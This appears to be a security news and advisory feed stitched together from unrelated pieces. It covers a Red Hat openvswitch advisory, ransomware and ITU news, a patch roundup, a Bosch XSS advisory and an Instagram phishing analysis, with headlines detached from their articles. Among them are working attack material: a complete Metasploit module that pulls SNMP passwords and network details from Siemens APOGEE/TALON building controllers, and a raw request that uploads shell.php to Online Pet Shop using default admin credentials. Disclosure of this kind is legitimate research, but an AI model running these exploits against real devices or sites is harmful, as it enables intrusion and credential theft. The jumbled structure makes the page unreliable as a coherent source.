Red Hat Security Advisory 2022-7268-01 - An update for openvswitch2.11 is now available for Red Hat OpenStack Platform 13 (Queens). Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 13.0 (openvswitch2.11) security update  
Advisory ID:       RHSA-2022:7268-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7268  
Issue date:        2022-11-01  
CVE Names:         CVE-2022-2132   
=====================================================================

1. Summary:

An update for openvswitch2.11 is now available for Red Hat OpenStack  
Platform 13 (Queens).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch, ppc64le, x86_64

3. Description:

Security Fix(es):

* DoS when a Vhost header crosses more than two descriptors and exhausts  
all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

ppc64le:  
openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

x86_64:  
openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86_64.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm

Red Hat OpenStack Platform 13.0 - ELS:

noarch:  
openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2EXQ9zjgjWX9erEAQgXJA//a9ABzUVg5uKXRRKpGwT3bq5X6eE4BIc/  
IIM1aeu8+eB5NuRkA3YN4ax3CiwRBRu7vG8a0xC1Ci3nyEGL3mXiWrgli/QGOV5P  
TFsVjQckJpqA14VxlI5DxUdXaE2US5ZxQY2SEyQAjYgZ6FYbLDqoDVAayDZ58GuC  
w5u8JxXqPaGMJJa1EhjTnUnyO6TT+4zSUAPGF+3wycbZnlMYBENOFRNVCDVeISPx  
7m5Ag8PmwYpnQR2PijcYlylXJT10LYcU2AdfZ+5QsehgEMnqQpXC6d0BKbSyM5gc  
oFtrblUrq16iivSLISXmjbDmASxsnJsfG95Gg4CDvX3BBlscsaPMv3UfltJls41u  
GfVjOpMUuz3BLJbrt3q5qpnoZJHQ2xIQf1l6OMT6uV37gg98DI7bwVcz2vhddKWU  
7v1cLVbxuKcEs8rK01tPlhVFedt0xHQj/xHukPJwF9GbbpUGXRb3rFOZIhqxaEFO  
5bwjriEXodk8IZ1OOyit6We9Eyv5Wdeb7MHFzPYX9PLz6TQltgzK5HT3IcMTSmBC  
mBdXaO4e7FV5BcLgRXcWokbHIb525ighA1DEuFfLNfL6j8g8LfxEbO6slezFI/zt  
UMJolhIlTubyFxLE+EroENhaSg2BVAxV6DIL1ja7XXRsJTGVb/jQ7ybl/xhKncCp  
2CQMgWLKVWw=  
=hMkz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7268-01

Dozens of international delegations meet for the second year to share intel, with a goal of stopping ransomware attacks on critical infrastructure.

U.S. officials will meet this week with delegations from more than 36 countries to share intelligence and strategize about how to push back against crippling and costly ransomware attacks against critical infrastructure.

The second-annual ransomware summit will include briefings from intelligence officials on the more than 4,000 cyberattacks that have occurred just over the past 18 months, Biden administration officials told reporters.

In addition to public sector experts, Microsoft and SAP will also contribute their data and analysis as part of their participation in the summit.

Russia, which is the country of origin of many ransomware operations, is not represented at the meetings.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

White House Convenes International Ransomware Summit

Plus: Important patches from Apple, VMWare, Cisco, Zimbra, SAP, and Oracle.

Other issues fixed in October are a heap buffer overflow in WebSQL tracked as CVE-2022-3446 and a use-after-free bug in Permissions API tracked as CVE-2022-3448, Google wrote in its blog. Google also fixed two use-after-free bugs in Safe Browsing and in Peer Connection.

Google Android

The Android Security Bulletin for October includes fixes for 15 flaws in the Framework and System and 33 issues in the kernel and vendor components. One of the most concerning issues is a critical security vulnerability in the Framework component that could lead to local escalation of privilege, tracked as CVE-2022-20419. Meanwhile, a flaw in the Kernel could also lead to local escalation of privilege with no additional execution privileges needed.

None of the issues are known to have been used in attacks, but it still makes sense to check your device and update it when you can. Google has issued the update to its Pixel devices and it’s also available for the Samsung Galaxy S21 and S22 series smartphones and Galaxy S21 FE.

Cisco

Cisco has urged companies to patch two flaws in its AnyConnect Secure Mobility Client for Windows after it was confirmed the vulnerabilities are being used in attacks. Tracked as CVE-2020-3433, the first could allow an attacker with valid credentials on Windows to execute code on the affected machine with system privileges.

Meanwhile, CVE-2020-3153 could allow an attacker with valid Windows credentials to copy malicious files to arbitrary locations with system-level privileges.

The US Cybersecurity and Infrastructure Security Agency has added the Cisco flaws to its already exploited vulnerabilities catalog.

While both the Cisco flaws require the attacker to be authenticated, it’s still important to update now.

Zoom

Video conferencing service Zoom patched several issues in October, including a flaw in its Zoom client for meetings, which is marked as having a high severity with a CVSS Score of 8.8. Zoom says versions before version 5.12.2 are susceptible to a URL-parsing vulnerability tracked as CVE-2022-28763.

“If a malicious Zoom meeting URL is opened, the link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers,” Zoom said in a security bulletin.

Earlier in the month, Zoom alerted users that its client for meetings for macOS starting with 5.10.6 and prior to 5.12.0 contained a debugging port misconfiguration.

VMWare

Software giant VMWare has patched a serious vulnerability in its Cloud Foundation

Tracked as CVE-2021-39144. The remote code execution vulnerability via XStream open source library is rated as having a critical severity with a maximum CVSSv3 base score of 9.8. “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation, a malicious actor can get remote code execution in the context of 'root' on the appliance,” VMWare said in an advisory.

The VMware Cloud Foundation update also addresses an XML External Entity vulnerability with a lesser CVSSv3 base score of 5.3. Tracked as CVE-2022-31678, the bug could allow an unauthenticated user to perform denial of service.

Zimbra

Software firm Zimbra has issued patches to fix an already-exploited code execution flaw that could allow an attacker to access user accounts. The issue, tracked as CVE-2022-41352, has a CVSS severity score of 9.8.

Exploitation was spotted by Rapid7 researchers, who identified signs it had been used in attacks. Zimbra initially released a workaround to fix it, but now the patch is available, you should apply it ASAP.

SAP

Enterprise software firm SAP has published 23 new and updated Security Notes in its October Patch Day. Among the most serious issues is a critical Path Traversal vulnerability in SAP Manufacturing Execution. The vulnerability affects two plugins: Work Instruction Viewer and Visual Test and Repair and has a CVSS score of 9.9.

Another issue with a CVSS score of 9.6 is an account hijacking vulnerability in the SAP Commerce login page.

Oracle

Software giant Oracle has released a whopping 370 patches as part of its quarterly security update. Oracle’s Critical Patch Update for October fixes 50 vulnerabilities rated as critical.

The update contains 37 new security patches for Oracle MySQL, 11 of which may be remotely exploitable without authentication. It also contains 24 new security patches for Oracle Financial Services Applications, 16 of which may be remotely exploitable without authentication.

Due to “the threat posed by a successful attack,” Oracle “strongly recommends” that customers apply Critical Patch Update security patches as soon as possible.

You Need to Update Google Chrome, Windows, and Zoom Right Now

Open-internet advocates are breathing a sigh of relief after a recent election for the International Telecommunications Union's top leadership.

While Bogdan-Martin’s win was significant, the down-ballot races also seemed to indicate a rejection of this expanded ITU mandate. A Russian incumbent lost his spot on the ITU’s radio regulatory board, while Russia was shut out of a seat on a broader regulatory council. Iran, which runs one of the world’s most expansive and authoritarian internet-filtering systems, also lost its council seat.

While China fared better, its support declined considerably. In 2018, Houlin Zhao was elected secretary-general with no competition—in 2022, a Chinese candidate came third in a race for a lesser position, only narrowly securing him a spot on the board.

Some of these successes are undoubtedly a result of American reengagement; the Trump White House first announced a plan to prioritize organizations like the ITU, which had been ignored by Washington for years, in 2017, in order to counteract China’s increasing success at these international bodies. Over the past year, President Joe Biden energetically campaigned for Bogdan-Martin’s candidacy.

Geopolitics—and Russia’s war against Ukraine, in particular—undoubtedly helped reshape the ITU’s leadership.

When Bella Cherkesova, a Russian deputy minister, stood to address the conference, she railed against the United States and its allies. “Recently, at the behest of certain countries, we have been confronting the politicization of the Union’s work,” Cherkesova said, lamenting that fully a third of Russia’s delegates had their visas rejected and could not attend the conference and that other Russian officials were not nominated to various administrative posts.

Cherkesova went on to laud Moscow’s promotion of the internet. “Russia provides security, protection of public order, health and morals of the population on the internet,” she said.

In a dueling speech, one of Ukraine’s representatives to the ITU offered a poignant counterpoint. “Representatives of the aggressor country are also here and talk about progress and standards,” Yurii Shchyhol, chair of the State Service of Special Communications and Information Protection of Ukraine, told the conference. “We have to defend ourselves.”

Shchyhol added that Russia had “turned into a weapon” the basic technology that the ITU is tasked with regulating and expanding. “Today, seven months after the invasion, we understand that the Russian Federation has also sought to destroy the connection in Ukraine,” Shchyhol continued, listing a variety of ways in which Russia has allegedly violated ITU rules.

While think tanks like CSIS and the Heritage Foundation have encouraged American engagement at the ITU to be focused on counteracting China, analysts more intimately involved in the ITU say the fight is more complicated—and, they say, this month’s meeting lacked ambition.

In its analysis of the proposals up for debate at the conference, the Internet Society, a nonprofit that promotes open technology, expressed disappointment that the ITU did not codify more formal cooperation with organizations like ICANN, nor did it make additional space for researchers and non-governmental organizations.

The Center for Democracy & Technology’s Knodel, who was also part of the American delegation, says inviting advocates like her has “made the ITU vastly more open than it once was. However, nongovernment stakeholders are far from welcomed at the ITU, which in the internet age is a stark contrast to the governance fora that are largely responsible for internet standardization and the cooperation required for implementing its decentralized design.”

While states like China are “proposing more technical designs that centralize control and surveillance,” Knodel says, even many of those discussions were sidestepped at the most recent conference.

Other big issues, like how to handle fees paid to countries that handle the fiber optic cables that make up the backbone of the internet—which could undercut revenues for poorer countries—have also been left unresolved.

Knodel says, with this new ITU leadership in place, the priority for the future should be figuring out “how to extend meaningful access to the internet rather than eroding it.”

The Election That Saved the Internet From Russia and China

Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the reports_id parameter.

**Version: 3.2.1****Description**

The reports\_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the reports\_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared.

**Proof of Concept******Step 1:** Add single quote was submitted in the reports\_id parameter, and a database error message was returned.**********Step 2:** Then add two quotes and submit the request, the error message disappears.**********Step 3:** Use SQLMap to dump full database.********Impact**

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.  
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

CVE-2022-43168: SQL injection Vulnerability on "reports_id" in rukovoditel 3.2.1 · Issue #1 · anhdq201/rukovoditel

APOLOGEE is a Python script and Metasploit module that enumerates a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers and TALON TC BACnet Automation Controllers. With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to access hidden directories in the web server. All versions prior to 3.5 are affected.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# 2022-05-23# Standard Modulesfrom metasploit import module# Extra Dependenciesdependencies_missing = Falsetry:    import logging    import requests    import requests    import xmltodict    import xml.etree.ElementTree as ET    import socket    import struct    import requestsexcept ImportError:    dependencies_missing = True# Metasploit Metadatametadata = {    'name': 'Siemens BACnet Field Panel Path Traversal',    'description': '''        This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server.    ''',    'authors': [        'RoseSecurity',        ],    'date': '2022-05-23',    'license': 'MSF_LICENSE',    'references': [        {'type': 'url', 'ref': 'https://sid.siemens.com/v/u/A6V10304985'},        {'type': 'cve', 'ref': 'https://nvd.nist.gov/vuln/detail/CVE-2017-9946'},    ],    'type': 'single_scanner',    'options': {        'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None},    }}def run(args):    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))    if dependencies_missing:        logging.error('Module dependency (requests) is missing, cannot continue')        return    try:      # Download Hidden XML File        r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False)          # Convert to Readable Format        xml_doc = r.content        root = ET.fromstring(xml_doc)          # Parse XML for Sensitive Data        module.log("Remote Site ID: " + root[18].text)        module.log("Building Level Network Name: " + root[26].text)        module.log("Site Name: " + root[27].text)        module.log("Hostname: " + root[28].text)        ip_addr = int(root[30].text, 16)        module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr)))        gw_addr = int(root[32].text, 16)        gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr)))        module.log("Gateway IP Address: " + gw_addr[::-1])        module.log("Maximum Transmission Size: " + root[57].text)        module.log("BACnet Device Name: " + root[60].text)        module.log("BACnet UDP Port: " + root[62].text)        module.log("Device Location: " + root[63].text)        module.log("Device Description: " + root[64].text)        module.log("Device Barcode: " + root[88].text)        module.log("Device Revision String: " + root[104].text)        module.log("Device Firmware: " + root[105].text)        module.log("Panel Key Name: " + root[109].text)        module.log("SNMP Username: " + root[148].text)        module.log("SNMP Private Password: " + root[149].text)        module.log("SNMP Authorization Password: " + root[150].text)              # Determine Running Services        if int(root[48].text) == 1:            module.log("Telnet Enabled")        else:            module.log("Telnet Disabled")        if int(root[84].text) == 1:            module.log("Wireless Enabled")        else:            module.log("Wireless Disabled")        if int(root[103].text) == 3:            module.log("Webserver Enabled")        else:            module.log("Webserver Disabled")    except requests.exceptions.RequestException as e:        logging.error('{}'.format(e))        returnif __name__ == '__main__':    module.run(metadata, run)

Siemens APOGEE PXC / TALON TC Authentication Bypass

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/classes/Master.php?f=save\_product

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the editing function of the product list module in the background management system

Request package for file upload：

POST /pet\_shop/classes/Master.php?f\=save\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=product/manage\_product&id=6
Content-Length: 2685
Content-Type: multipart/form-data; boundary=---------------------------162223033527413
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------162223033527413
Content-Disposition: form-data; name="id"
6
\-----------------------------162223033527413
Content-Disposition: form-data; name="category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="sub\_category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="product\_name"
Dog Belt
\-----------------------------162223033527413
Content-Disposition: form-data; name="description"
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas dui nulla, tincidunt in arcu at, vulputate volutpat velit. Quisque volutpat gravida erat, gravida porttitor magna malesuada sed. Curabitur massa est, ullamcorper a diam vitae, tincidunt sagittis justo. Nam eu orci ligula. Duis ullamcorper dui at nisi consequat, sed suscipit sapien lacinia. Praesent ut lacus id arcu bibendum egestas. Cras ullamcorper dictum mi, non commodo mauris iaculis a. Pellentesque porta sem id dapibus tincidunt. Aenean metus tellus, efficitur ut feugiat in, euismod et arcu. In pharetra, dolor in fermentum facilisis, metus urna lacinia metus, in maximus justo tellus et tortor. Nam pulvinar eu enim auctor pellentesque.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Nam ut quam velit. Suspendisse commodo non urna nec dictum. Pellentesque eget enim id velit bibendum auctor vel id lectus. Maecenas dolor nibh, ultricies eget metus vel, efficitur varius tellus. Donec semper eros sit amet urna bibendum scelerisque. Interdum et malesuada fames ac ante ipsum primis in faucibus. Integer cursus est in sapien sodales, quis pulvinar nisl aliquet. Pellentesque blandit diam lobortis pulvinar ornare. Sed venenatis imperdiet massa, ut mollis sapien sagittis a. Nulla dignissim ultrices metus a mattis. Nunc egestas mattis nisl at posuere. Donec malesuada ut justo sed aliquam. Sed venenatis sit amet tortor et semper. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Vivamus sit amet massa at massa malesuada volutpat quis nec libero.</p>
\-----------------------------162223033527413
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
\-----------------------------162223033527413
Content-Disposition: form-data; name="status"
1
\-----------------------------162223033527413
Content-Disposition: form-data; name="img\[\]"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------162223033527413--

The files will be uploaded to this directory \\pet\_shop\\uploads\\product\_6 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-39978: bug_report/RCE-1.md at main · z1pwn/bug_report

Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1

CVE-2022-0072: openlitespeed/httpserver.cpp at v1.7.16 · litespeedtech/openlitespeed

Incomplete filtering of JavaScript code in different configuration fields of the web based interface of the VIDEOJET multi 4000 allows an attacker with administrative credentials to store JavaScript code which will be executed for all administrators accessing the same configuration option.

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-454166-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2022-40183
        *   Base Score: 5.8 (Medium)
    *   CVE-2022-40184
        *   Base Score: 5.1 (Medium)
*   **Published:** 19 Oct 2022
*   **Last Updated:** 19 Oct 2022

**Summary**

The possibility for a reflected Cross Site Scripting (XSS) and stored Cross Site Scripting (XSS) attack was discovered in the Bosch VIDEOJET multi 4000.

For more details please see the description of the vulnerability in this advisory.

Bosch rates this vulnerability with CVSSv3.1 base score 5.8 (medium) and 5.1 (medium), where the final rating depends on the customer’s environment.

Customers are advised to follow listed mitigations until an update is available.

**Affected Products**

*   Bosch VIDEOJET multi 4000 <= 6.31.0010

**Solution and Mitigations****Secure Configuration Environment**

It is advised to use a Bosch tool like the Configuration Manager to configure the encoder, that is not vulnerable to issues like XSS (Cross Site Scripting) or CSRF (Cross Site Request Forgery).

When using the web based configuration interface and currently being logged in as an administrator, some security precautions can be taken to mitigate XSS or CSRF vulnerabilities:

*   No other websites or email content should be opened as long as the session to the encoder is active.
    
*   No links should be clicked from an untrusted external source that link back to the encoder.
    
*   Use a different browser than the system default browser to open a session to the encoder as there is no XSS or CSRF between browsers.
    
*   Always log out and/or close the browser (not only the tab) to clear any session data.
    

**Secure Administration**

A stored XSS attack is only possible when an user with administrative rights is able to save malicious JavaScript code on the device. Only trusted users should have access to the administrative interface and common security rules for administrative credentials should be followed (e.g. using strong, unique passwords).

**Vulnerability Details****CVE-2022-40183**

CVE description: An error in the URL handler of the VIDEOJET multi 4000 may lead to a reflected cross site scripting (XSS) in the web-based interface. An attacker with knowledge of the encoder address can send a crafted link to a user, which will execute JavaScript code in the context of the user.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L
    *   Base Score: 5.8 (Medium)

**CVE-2022-40184**

CVE description: Incomplete filtering of JavaScript code in different configuration fields of the web based interface of the VIDEOJET multi 4000 allows an attacker with administrative credentials to store JavaScript code which will be executed for all administrators accessing the same configuration option.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L
    *   Base Score: 5.1 (Medium)

**Remarks****Security Update Information**

With respect to Directive (EU) 2019/770 and Directive (EU) 2019/771 and their national transposition laws, please note:

It is your responsibility to download and/or install any security updates provided by us, for example to maintain product or data security. If you fail to install a security update provided to you within a reasonable period of time, we will not be liable for any product defect solely due to the absence of such security update.

Alternatively, we are entitled to directly download and/or install security updates regardless of your settings. In these cases, we will provide you with the relevant information, e.g. in this security advisory.

**CVSS Scoring**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

*   \[1\] Firmware Download Area: https://downloadstore.boschsecurity.com/index.php?type=FW

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   19 Oct 2022: Initial Publication

**Appendix****Affected Products****Bosch VIDEOJET multi 4000**

Affected VIDEOJET multi 4000 firmware

Name of version to fix the vulnerability

6.31.0010 and earlier

VIDEOJET multi Download Area

**Material Lists****VIDEOJET multi 4000**

Family Name

CTN

SAP#

Material description

VIDEOJET multi 4000

VJM-4016

F.01U.298.670

VIDEOJET multi 4000

VIDEOJET multi 4000 EU

VJM-4016-EU

F.01U.296.122

VIDEOJET multi 4000 EU

VIDEOJET multi 4000 US

VJM-4016-US

F.01U.298.556

VIDEOJET multi 4000 US

CVE-2022-40184: Multiple Cross Site Scripting vulnerabilities in Bosch VIDEOJET multi 4000

A novel campaign is using an emerging URL redirection tactic to try to trick business users and others into clicking on an embedded link and giving up credentials.

Threat actors are targeting Instagram users in a new phishing campaign that uses URL redirection to take over accounts, or steal sensitive information that can be used in future attacks or be sold on the Dark Web.  

As a lure, the campaign uses a suggestion that users may be committing copyright infringement — a great concern among social media influencers, businesses, and even the average account holder on Instagram, researchers from Trustwave SpiderLabs revealed in an analysis shared with Dark Reading on Oct. 27.

This type of "infringement phishing" was also seen earlier this year, in a separate campaign targeting users of Facebook — a brand also under Instagram parent company Meta — with emails suggesting users had violated community standards, the researchers said.

"This theme is not new, and we have seen it from time to time over the last year," Homer Pacag, Trustwave SpiderLabs security researcher, wrote in the post. "It’s the same copyright infringement trickery again, but this time, the attackers gain more personal information from their victims and use evasion techniques to hide phishing URLs."

That evasion comes in the form of URL redirection, an emerging tactic among threat actors who are evolving their phishing techniques to be sneakier and more evasive as internet users get more savvy.

Instead of attaching a malicious file that a user must click on to reach a phishing page — something that many people already know seems suspicious — URL redirection includes in a message an embedded URL that appears legitimate but which ultimately leads to a malicious page that steals credentials instead.

**Bogus Copyright Report**

The Instagram campaign that researchers discovered begins with an email to a user notifying him or her that complaints were received about the account infringing upon copyright, and that an appeal to Instagram is necessary if the user doesn't want to lose the account.

Anyone can file a copyright report with Instagram if the account owner discovers that their photos and videos are being used by other Instagram users — something that happens often on the social media platform. Attackers in the campaign are taking advantage of this to try to trick victims into giving away their user credentials and personal information, Pacag wrote.

The phishing emails include a button with a link to an "appeals form," informing users they can click the link to fill out the form and later will be contacted by an Instagram representative.

Researchers analyzed the email in a text editor and found that, rather than directing users to the Instagram site to fill out a legitimate report, it employs URL redirection. Specifically, the link uses a URL rewrite or redirector to a site owned by WhatsApp — hxxps://l\[.\]wl\[.\]co/l?u= — followed by the true phishing URL — hxxps://helperlivesback\[.\]ml/5372823 — found in the query part of the URL, Pacag explained.

"This is an increasingly common phishing trick, using legitimate domains to redirect to other URLs in this fashion," he wrote.

If a user clicks on the button, it opens his or her default browser and redirects the user to the intended phishing page, going through a few steps ultimately to steal user and password data if the victim follows through, the researchers said.

**Step-by-Step Data Harvesting**

First, if the victim enters his or her username, the data is sent to the server via the form "POST" parameters, the researchers said. A user is prompted to click a "Continue" button, and if this is done, the page displays the typed username, now prefixed with the typical "@" symbol used to signify an Instagram username. Then the page asks for a password, which, if entered, also is sent to the attacker-controlled server, the researchers said.

It's at this point in the attack where things deviate slightly from a typical phishing page, which is usually satisfied once a person enters their username and password into the appropriate fields, Pacag said.

The attackers in the Instagram campaign don't stop at this step; instead, they ask the user to type in his or her password once more and then fill in a question field asking in which city the person lives. This data, like the rest, also is sent back to the server via "POST," Pacag explained.

The last step prompts the user to fill in his or her telephone number, which presumably attackers can use to get past two-factor authentication (2FA) if it's enabled on an Instagram account, the researchers said. Attackers also can sell this info on the Dark Web, in which case it can be used for future scams that initiate via telephone calls, they noted.

Once all of this personal info is harvested by attackers, the victim is finally redirected to Instagram's actual help page and the beginning of the authentic copyright reporting process used to initiate the scam.

**Detecting Novel Phishing Tactics**

With URL redirection and other more evasive tactics being taken by threat actors in phishing campaigns, it's getting harder to detect — for both email security solutions and users alike — which emails are legitimate and which are the product of malicious intent, the researchers said.

"It can be difficult for most URL detection systems to identify this deceptive practice, as the intended phishing URLs are embedded mostly in the URL query parameters," Pacag said.

Until technology catches up with the constantly changing tactics of phishers, email users themselves — especially in a corporate setting — need to maintain a higher degree of alert when it comes to messages that appear suspicious in any way to avoid being fooled, the researchers said.

Ways users can do this are by checking that URLs included in messages match the legitimate ones of the company or service that claims to be sending them; only clicking on links in emails that come from trusted users with whom people have communicated with previously; and checking with IT support before clicking on any embedded or attached link in an email.

Tag

#sap